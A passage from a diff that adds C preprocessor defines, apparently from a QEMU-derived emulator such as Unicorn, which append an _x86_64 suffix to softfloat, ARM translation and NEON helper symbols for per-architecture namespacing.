define_one_arm_cp_reg_with_opaque_x86_64 +#define deposit32 deposit32_x86_64 +#define deposit64 deposit64_x86_64 +#define deregister_tm_clones deregister_tm_clones_x86_64 +#define device_class_base_init device_class_base_init_x86_64 +#define device_class_init device_class_init_x86_64 +#define device_finalize device_finalize_x86_64 +#define device_get_realized device_get_realized_x86_64 +#define device_initfn device_initfn_x86_64 +#define device_post_init device_post_init_x86_64 +#define device_reset device_reset_x86_64 +#define device_set_realized device_set_realized_x86_64 +#define device_type_info device_type_info_x86_64 +#define disas_arm_insn disas_arm_insn_x86_64 +#define disas_coproc_insn disas_coproc_insn_x86_64 +#define disas_dsp_insn disas_dsp_insn_x86_64 +#define disas_iwmmxt_insn disas_iwmmxt_insn_x86_64 +#define disas_neon_data_insn disas_neon_data_insn_x86_64 +#define disas_neon_ls_insn disas_neon_ls_insn_x86_64 +#define disas_thumb2_insn disas_thumb2_insn_x86_64 +#define disas_thumb_insn disas_thumb_insn_x86_64 +#define disas_vfp_insn disas_vfp_insn_x86_64 +#define disas_vfp_v8_insn disas_vfp_v8_insn_x86_64 +#define do_arm_semihosting do_arm_semihosting_x86_64 +#define do_clz16 do_clz16_x86_64 +#define do_clz8 do_clz8_x86_64 +#define do_constant_folding do_constant_folding_x86_64 +#define do_constant_folding_2 do_constant_folding_2_x86_64 +#define do_constant_folding_cond do_constant_folding_cond_x86_64 +#define do_constant_folding_cond2 do_constant_folding_cond2_x86_64 +#define do_constant_folding_cond_32 do_constant_folding_cond_32_x86_64 +#define do_constant_folding_cond_64 do_constant_folding_cond_64_x86_64 +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_x86_64 +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_x86_64 +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_x86_64 +#define do_ssat do_ssat_x86_64 +#define do_usad do_usad_x86_64 +#define do_usat do_usat_x86_64 +#define do_v7m_exception_exit do_v7m_exception_exit_x86_64 +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_x86_64 +#define dummy_func dummy_func_x86_64 +#define dummy_section dummy_section_x86_64 +#define _DYNAMIC _DYNAMIC_x86_64 +#define _edata _edata_x86_64 +#define _end _end_x86_64 +#define end_list end_list_x86_64 +#define eq128 eq128_x86_64 +#define ErrorClass_lookup ErrorClass_lookup_x86_64 +#define error_copy error_copy_x86_64 +#define error_exit error_exit_x86_64 +#define error_get_class error_get_class_x86_64 +#define error_get_pretty error_get_pretty_x86_64 +#define error_setg_file_open error_setg_file_open_x86_64 +#define estimateDiv128To64 estimateDiv128To64_x86_64 +#define estimateSqrt32 estimateSqrt32_x86_64 +#define excnames excnames_x86_64 +#define excp_is_internal excp_is_internal_x86_64 +#define extended_addresses_enabled extended_addresses_enabled_x86_64 +#define extended_mpu_ap_bits extended_mpu_ap_bits_x86_64 +#define extract32 extract32_x86_64 +#define extract64 extract64_x86_64 +#define extractFloat128Exp extractFloat128Exp_x86_64 +#define extractFloat128Frac0 extractFloat128Frac0_x86_64 +#define extractFloat128Frac1 extractFloat128Frac1_x86_64 +#define extractFloat128Sign extractFloat128Sign_x86_64 +#define extractFloat16Exp extractFloat16Exp_x86_64 +#define extractFloat16Frac extractFloat16Frac_x86_64 +#define extractFloat16Sign extractFloat16Sign_x86_64 +#define extractFloat32Exp extractFloat32Exp_x86_64 +#define extractFloat32Frac extractFloat32Frac_x86_64 +#define extractFloat32Sign extractFloat32Sign_x86_64 +#define extractFloat64Exp extractFloat64Exp_x86_64 +#define extractFloat64Frac extractFloat64Frac_x86_64 +#define extractFloat64Sign extractFloat64Sign_x86_64 +#define extractFloatx80Exp extractFloatx80Exp_x86_64 +#define extractFloatx80Frac extractFloatx80Frac_x86_64 +#define extractFloatx80Sign extractFloatx80Sign_x86_64 +#define fcse_write fcse_write_x86_64 +#define find_better_copy find_better_copy_x86_64 +#define find_default_machine find_default_machine_x86_64 +#define find_desc_by_name find_desc_by_name_x86_64 +#define find_first_bit find_first_bit_x86_64 +#define find_paging_enabled_cpu find_paging_enabled_cpu_x86_64 +#define find_ram_block find_ram_block_x86_64 +#define find_ram_offset find_ram_offset_x86_64 +#define find_string find_string_x86_64 +#define find_type find_type_x86_64 +#define _fini _fini_x86_64 +#define flatrange_equal flatrange_equal_x86_64 +#define flatview_destroy flatview_destroy_x86_64 +#define flatview_init flatview_init_x86_64 +#define flatview_insert flatview_insert_x86_64 +#define flatview_lookup flatview_lookup_x86_64 +#define flatview_ref flatview_ref_x86_64 +#define flatview_simplify flatview_simplify_x86_64 +#define flatview_unref flatview_unref_x86_64 +#define float128_add float128_add_x86_64 +#define float128_compare float128_compare_x86_64 +#define float128_compare_internal float128_compare_internal_x86_64 +#define float128_compare_quiet float128_compare_quiet_x86_64 +#define float128_default_nan float128_default_nan_x86_64 +#define float128_div float128_div_x86_64 +#define float128_eq float128_eq_x86_64 +#define float128_eq_quiet float128_eq_quiet_x86_64 +#define float128_is_quiet_nan float128_is_quiet_nan_x86_64 +#define float128_is_signaling_nan float128_is_signaling_nan_x86_64 +#define float128_le float128_le_x86_64 +#define float128_le_quiet float128_le_quiet_x86_64 +#define float128_lt float128_lt_x86_64 +#define float128_lt_quiet float128_lt_quiet_x86_64 +#define float128_maybe_silence_nan float128_maybe_silence_nan_x86_64 +#define float128_mul float128_mul_x86_64 +#define float128_rem float128_rem_x86_64 +#define float128_round_to_int float128_round_to_int_x86_64 +#define float128_scalbn float128_scalbn_x86_64 +#define float128_sqrt float128_sqrt_x86_64 +#define float128_sub float128_sub_x86_64 +#define float128ToCommonNaN float128ToCommonNaN_x86_64 +#define float128_to_float32 float128_to_float32_x86_64 +#define float128_to_float64 float128_to_float64_x86_64 +#define float128_to_floatx80 float128_to_floatx80_x86_64 +#define float128_to_int32 float128_to_int32_x86_64 +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_x86_64 +#define float128_to_int64 float128_to_int64_x86_64 +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_x86_64 +#define float128_unordered float128_unordered_x86_64 +#define float128_unordered_quiet float128_unordered_quiet_x86_64 +#define float16_default_nan float16_default_nan_x86_64 +#define float16_is_quiet_nan float16_is_quiet_nan_x86_64 +#define float16_is_signaling_nan float16_is_signaling_nan_x86_64 +#define float16_maybe_silence_nan float16_maybe_silence_nan_x86_64 +#define float16ToCommonNaN float16ToCommonNaN_x86_64 +#define float16_to_float32 float16_to_float32_x86_64 +#define float16_to_float64 float16_to_float64_x86_64 +#define float32_abs float32_abs_x86_64 +#define float32_add float32_add_x86_64 +#define float32_chs float32_chs_x86_64 +#define float32_compare float32_compare_x86_64 +#define float32_compare_internal float32_compare_internal_x86_64 +#define float32_compare_quiet float32_compare_quiet_x86_64 +#define float32_default_nan float32_default_nan_x86_64 +#define float32_div float32_div_x86_64 +#define float32_eq float32_eq_x86_64 +#define float32_eq_quiet float32_eq_quiet_x86_64 +#define float32_exp2 float32_exp2_x86_64 +#define float32_exp2_coefficients float32_exp2_coefficients_x86_64 +#define float32_is_any_nan float32_is_any_nan_x86_64 +#define float32_is_infinity float32_is_infinity_x86_64 +#define float32_is_neg float32_is_neg_x86_64 +#define float32_is_quiet_nan float32_is_quiet_nan_x86_64 +#define float32_is_signaling_nan float32_is_signaling_nan_x86_64 +#define float32_is_zero float32_is_zero_x86_64 +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_x86_64 +#define float32_le float32_le_x86_64 +#define float32_le_quiet float32_le_quiet_x86_64 +#define float32_log2 float32_log2_x86_64 +#define float32_lt float32_lt_x86_64 +#define float32_lt_quiet float32_lt_quiet_x86_64 +#define float32_max float32_max_x86_64 +#define float32_maxnum float32_maxnum_x86_64 +#define float32_maxnummag float32_maxnummag_x86_64 +#define float32_maybe_silence_nan float32_maybe_silence_nan_x86_64 +#define float32_min float32_min_x86_64 +#define float32_minmax float32_minmax_x86_64 +#define float32_minnum float32_minnum_x86_64 +#define float32_minnummag float32_minnummag_x86_64 +#define float32_mul float32_mul_x86_64 +#define float32_muladd float32_muladd_x86_64 +#define float32_rem float32_rem_x86_64 +#define float32_round_to_int float32_round_to_int_x86_64 +#define float32_scalbn float32_scalbn_x86_64 +#define float32_set_sign float32_set_sign_x86_64 +#define float32_sqrt float32_sqrt_x86_64 +#define float32_squash_input_denormal float32_squash_input_denormal_x86_64 +#define float32_sub float32_sub_x86_64 +#define float32ToCommonNaN float32ToCommonNaN_x86_64 +#define float32_to_float128 float32_to_float128_x86_64 +#define float32_to_float16 float32_to_float16_x86_64 +#define float32_to_float64 float32_to_float64_x86_64 +#define float32_to_floatx80 float32_to_floatx80_x86_64 +#define float32_to_int16 float32_to_int16_x86_64 +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_x86_64 +#define float32_to_int32 float32_to_int32_x86_64 +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_x86_64 +#define float32_to_int64 float32_to_int64_x86_64 +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_x86_64 +#define float32_to_uint16 float32_to_uint16_x86_64 +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_x86_64 +#define float32_to_uint32 float32_to_uint32_x86_64 +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_x86_64 +#define float32_to_uint64 float32_to_uint64_x86_64 +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_x86_64 +#define float32_unordered float32_unordered_x86_64 +#define float32_unordered_quiet float32_unordered_quiet_x86_64 +#define float64_abs float64_abs_x86_64 +#define float64_add float64_add_x86_64 +#define float64_chs float64_chs_x86_64 +#define float64_compare float64_compare_x86_64 +#define float64_compare_internal float64_compare_internal_x86_64 +#define float64_compare_quiet float64_compare_quiet_x86_64 +#define float64_default_nan float64_default_nan_x86_64 +#define float64_div float64_div_x86_64 +#define float64_eq float64_eq_x86_64 +#define float64_eq_quiet float64_eq_quiet_x86_64 +#define float64_is_any_nan float64_is_any_nan_x86_64 +#define float64_is_infinity float64_is_infinity_x86_64 +#define float64_is_neg float64_is_neg_x86_64 +#define float64_is_quiet_nan float64_is_quiet_nan_x86_64 +#define float64_is_signaling_nan float64_is_signaling_nan_x86_64 +#define float64_is_zero float64_is_zero_x86_64 +#define float64_le float64_le_x86_64 +#define float64_le_quiet float64_le_quiet_x86_64 +#define float64_log2 float64_log2_x86_64 +#define float64_lt float64_lt_x86_64 +#define float64_lt_quiet float64_lt_quiet_x86_64 +#define float64_max float64_max_x86_64 +#define float64_maxnum float64_maxnum_x86_64 +#define float64_maxnummag float64_maxnummag_x86_64 +#define float64_maybe_silence_nan float64_maybe_silence_nan_x86_64 +#define float64_min float64_min_x86_64 +#define float64_minmax float64_minmax_x86_64 +#define float64_minnum float64_minnum_x86_64 +#define float64_minnummag float64_minnummag_x86_64 +#define float64_mul float64_mul_x86_64 +#define float64_muladd float64_muladd_x86_64 +#define float64_rem float64_rem_x86_64 +#define float64_round_to_int float64_round_to_int_x86_64 +#define float64_scalbn float64_scalbn_x86_64 +#define float64_set_sign float64_set_sign_x86_64 +#define float64_sqrt float64_sqrt_x86_64 +#define float64_squash_input_denormal float64_squash_input_denormal_x86_64 +#define float64_sub float64_sub_x86_64 +#define float64ToCommonNaN float64ToCommonNaN_x86_64 +#define float64_to_float128 float64_to_float128_x86_64 +#define float64_to_float16 float64_to_float16_x86_64 +#define float64_to_float32 float64_to_float32_x86_64 +#define float64_to_floatx80 float64_to_floatx80_x86_64 +#define float64_to_int16 float64_to_int16_x86_64 +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_x86_64 +#define float64_to_int32 float64_to_int32_x86_64 +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_x86_64 +#define float64_to_int64 float64_to_int64_x86_64 +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_x86_64 +#define float64_to_uint16 float64_to_uint16_x86_64 +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_x86_64 +#define float64_to_uint32 float64_to_uint32_x86_64 +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_x86_64 +#define float64_to_uint64 float64_to_uint64_x86_64 +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_x86_64 +#define float64_trunc_to_int float64_trunc_to_int_x86_64 +#define float64_unordered float64_unordered_x86_64 +#define float64_unordered_quiet float64_unordered_quiet_x86_64 +#define float_raise float_raise_x86_64 +#define floatx80_add floatx80_add_x86_64 +#define floatx80_compare floatx80_compare_x86_64 +#define floatx80_compare_internal floatx80_compare_internal_x86_64 +#define floatx80_compare_quiet floatx80_compare_quiet_x86_64 +#define floatx80_default_nan floatx80_default_nan_x86_64 +#define floatx80_div floatx80_div_x86_64 +#define floatx80_eq floatx80_eq_x86_64 +#define floatx80_eq_quiet floatx80_eq_quiet_x86_64 +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_x86_64 +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_x86_64 +#define floatx80_le floatx80_le_x86_64 +#define floatx80_le_quiet floatx80_le_quiet_x86_64 +#define floatx80_lt floatx80_lt_x86_64 +#define floatx80_lt_quiet floatx80_lt_quiet_x86_64 +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_x86_64 +#define floatx80_mul floatx80_mul_x86_64 +#define floatx80_rem floatx80_rem_x86_64 +#define floatx80_round_to_int floatx80_round_to_int_x86_64 +#define floatx80_scalbn floatx80_scalbn_x86_64 +#define floatx80_sqrt floatx80_sqrt_x86_64 +#define floatx80_sub floatx80_sub_x86_64 +#define floatx80ToCommonNaN floatx80ToCommonNaN_x86_64 +#define floatx80_to_float128 floatx80_to_float128_x86_64 +#define floatx80_to_float32 floatx80_to_float32_x86_64 +#define floatx80_to_float64 floatx80_to_float64_x86_64 +#define floatx80_to_int32 floatx80_to_int32_x86_64 +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_x86_64 +#define floatx80_to_int64 floatx80_to_int64_x86_64 +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_x86_64 +#define floatx80_unordered floatx80_unordered_x86_64 +#define floatx80_unordered_quiet floatx80_unordered_quiet_x86_64 +#define flush_icache_range flush_icache_range_x86_64 +#define format_string format_string_x86_64 +#define fp_decode_rm fp_decode_rm_x86_64 +#define frame_dummy frame_dummy_x86_64 +#define free_range free_range_x86_64 +#define fstat64 fstat64_x86_64 +#define futex_wait futex_wait_x86_64 +#define futex_wake futex_wake_x86_64 +#define gen_aa32_ld16s gen_aa32_ld16s_x86_64 +#define gen_aa32_ld16u gen_aa32_ld16u_x86_64 +#define gen_aa32_ld32u gen_aa32_ld32u_x86_64 +#define gen_aa32_ld64 gen_aa32_ld64_x86_64 +#define gen_aa32_ld8s gen_aa32_ld8s_x86_64 +#define gen_aa32_ld8u gen_aa32_ld8u_x86_64 +#define gen_aa32_st16 gen_aa32_st16_x86_64 +#define gen_aa32_st32 gen_aa32_st32_x86_64 +#define gen_aa32_st64 gen_aa32_st64_x86_64 +#define gen_aa32_st8 gen_aa32_st8_x86_64 +#define gen_adc gen_adc_x86_64 +#define gen_adc_CC gen_adc_CC_x86_64 +#define gen_add16 gen_add16_x86_64 +#define gen_add_carry gen_add_carry_x86_64 +#define gen_add_CC gen_add_CC_x86_64 +#define gen_add_datah_offset gen_add_datah_offset_x86_64 +#define gen_add_data_offset gen_add_data_offset_x86_64 +#define gen_addq gen_addq_x86_64 +#define gen_addq_lo gen_addq_lo_x86_64 +#define gen_addq_msw gen_addq_msw_x86_64 +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_x86_64 +#define gen_arm_shift_im gen_arm_shift_im_x86_64 +#define gen_arm_shift_reg gen_arm_shift_reg_x86_64 +#define gen_bx gen_bx_x86_64 +#define gen_bx_im gen_bx_im_x86_64 +#define gen_clrex gen_clrex_x86_64 +#define generate_memory_topology generate_memory_topology_x86_64 +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_x86_64 +#define gen_exception gen_exception_x86_64 +#define gen_exception_insn gen_exception_insn_x86_64 +#define gen_exception_internal gen_exception_internal_x86_64 +#define gen_exception_internal_insn gen_exception_internal_insn_x86_64 +#define gen_exception_return gen_exception_return_x86_64 +#define gen_goto_tb gen_goto_tb_x86_64 +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_x86_64 +#define gen_helper_add_saturate gen_helper_add_saturate_x86_64 +#define gen_helper_add_setq gen_helper_add_setq_x86_64 +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_x86_64 +#define gen_helper_clz32 gen_helper_clz32_x86_64 +#define gen_helper_clz64 gen_helper_clz64_x86_64 +#define gen_helper_clz_arm gen_helper_clz_arm_x86_64 +#define gen_helper_cpsr_read gen_helper_cpsr_read_x86_64 +#define gen_helper_cpsr_write gen_helper_cpsr_write_x86_64 +#define gen_helper_crc32_arm gen_helper_crc32_arm_x86_64 +#define gen_helper_crc32c gen_helper_crc32c_x86_64 +#define gen_helper_crypto_aese gen_helper_crypto_aese_x86_64 +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_x86_64 +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_x86_64 +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_x86_64 +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_x86_64 +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_x86_64 +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_x86_64 +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_x86_64 +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_x86_64 +#define gen_helper_double_saturate gen_helper_double_saturate_x86_64 +#define gen_helper_exception_internal gen_helper_exception_internal_x86_64 +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_x86_64 +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_x86_64 +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_x86_64 +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_x86_64 +#define gen_helper_get_user_reg gen_helper_get_user_reg_x86_64 +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_x86_64 +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_x86_64 +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_x86_64 +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_x86_64 +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_x86_64 +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_x86_64 +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_x86_64 +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_x86_64 +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_x86_64 +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_x86_64 +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_x86_64 +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_x86_64 +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_x86_64 +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_x86_64 +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_x86_64 +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_x86_64 +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_x86_64 +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_x86_64 +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_x86_64 +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_x86_64 +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_x86_64 +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_x86_64 +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_x86_64 +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_x86_64 +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_x86_64 +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_x86_64 +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_x86_64 +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_x86_64 +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_x86_64 +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_x86_64 +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_x86_64 +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_x86_64 +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_x86_64 +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_x86_64 +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_x86_64 +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_x86_64 +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_x86_64 +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_x86_64 +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_x86_64 +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_x86_64 +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_x86_64 +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_x86_64 +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_x86_64 +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_x86_64 +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_x86_64 +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_x86_64 +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_x86_64 +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_x86_64 +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_x86_64 +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_x86_64 +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_x86_64 +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_x86_64 +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_x86_64 +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_x86_64 +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_x86_64 +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_x86_64 +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_x86_64 +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_x86_64 +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_x86_64 +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_x86_64 +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_x86_64 +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_x86_64 +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_x86_64 +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_x86_64 +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_x86_64 +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_x86_64 +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_x86_64 +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_x86_64 +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_x86_64 +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_x86_64 +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_x86_64 +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_x86_64 +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_x86_64 +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_x86_64 +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_x86_64 +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_x86_64 +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_x86_64 +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_x86_64 +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_x86_64 +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_x86_64 +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_x86_64 +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_x86_64 +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_x86_64 +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_x86_64 +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_x86_64 +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_x86_64 +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_x86_64 +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_x86_64 +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_x86_64 +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_x86_64 +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_x86_64 +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_x86_64 +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_x86_64 +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_x86_64 +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_x86_64 +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_x86_64 +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_x86_64 +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_x86_64 +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_x86_64 +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_x86_64 +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_x86_64 +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_x86_64 +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_x86_64 +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_x86_64 +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_x86_64 +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_x86_64 +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_x86_64 +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_x86_64 +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_x86_64 +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_x86_64 +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_x86_64 +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_x86_64 +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_x86_64 +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_x86_64 +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_x86_64 +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_x86_64 +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_x86_64 +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_x86_64 +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_x86_64 +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_x86_64 +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_x86_64 +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_x86_64 +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_x86_64 +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_x86_64 +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_x86_64 +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_x86_64 +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_x86_64 +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_x86_64 +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_x86_64 +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_x86_64 +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_x86_64 +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_x86_64 +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_x86_64 +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_x86_64 +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_x86_64 +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_x86_64 +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_x86_64 +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_x86_64 +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_x86_64 +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_x86_64 +#define gen_helper_neon_cgt_s16 